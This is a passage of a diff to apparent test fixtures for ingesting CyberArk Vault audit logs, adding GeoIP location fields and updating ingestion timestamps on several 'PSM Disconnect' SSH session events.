Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -219,10 +228,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -306,7 +324,7 @@ "event": { "severity": 2, "duration": 11000000000, - "ingested": "2021-12-09T13:36:49.813728600Z", + "ingested": "2021-12-14T14:42:15.678829917Z", "original": "\u003c5\u003e1 2021-03-11T17:47:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:47:01\",\"IsoTimestamp\":\"2021-03-11T17:47:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -330,10 +348,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -417,7 +444,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813781400Z", + "ingested": "2021-12-14T14:42:15.678830339Z", "original": "\u003c5\u003e1 2021-03-11T17:48:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:40\",\"IsoTimestamp\":\"2021-03-11T17:48:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -441,10 +468,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -528,7 +564,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813790600Z", + "ingested": "2021-12-14T14:42:15.678830734Z", "original": "\u003c5\u003e1 2021-03-11T17:55:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:55:02\",\"IsoTimestamp\":\"2021-03-11T17:55:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -552,10 +588,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -639,7 +684,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813796Z", + "ingested": "2021-12-14T14:42:15.678831318Z", "original": "\u003c5\u003e1 2021-03-11T17:56:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:42\",\"IsoTimestamp\":\"2021-03-11T17:56:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -663,10 +708,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -750,7 +804,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813801300Z", + "ingested": "2021-12-14T14:42:15.678831707Z", "original": "\u003c5\u003e1 2021-03-11T20:23:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:30\",\"IsoTimestamp\":\"2021-03-11T20:23:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", 
@@ -774,17 +828,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -866,7 +938,7 @@ "event": { "severity": 2, "duration": 18000000000, - "ingested": "2021-12-09T13:36:49.813806700Z", + "ingested": "2021-12-14T14:42:15.678832123Z", "original": "\u003c5\u003e1 2021-03-14T13:49:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 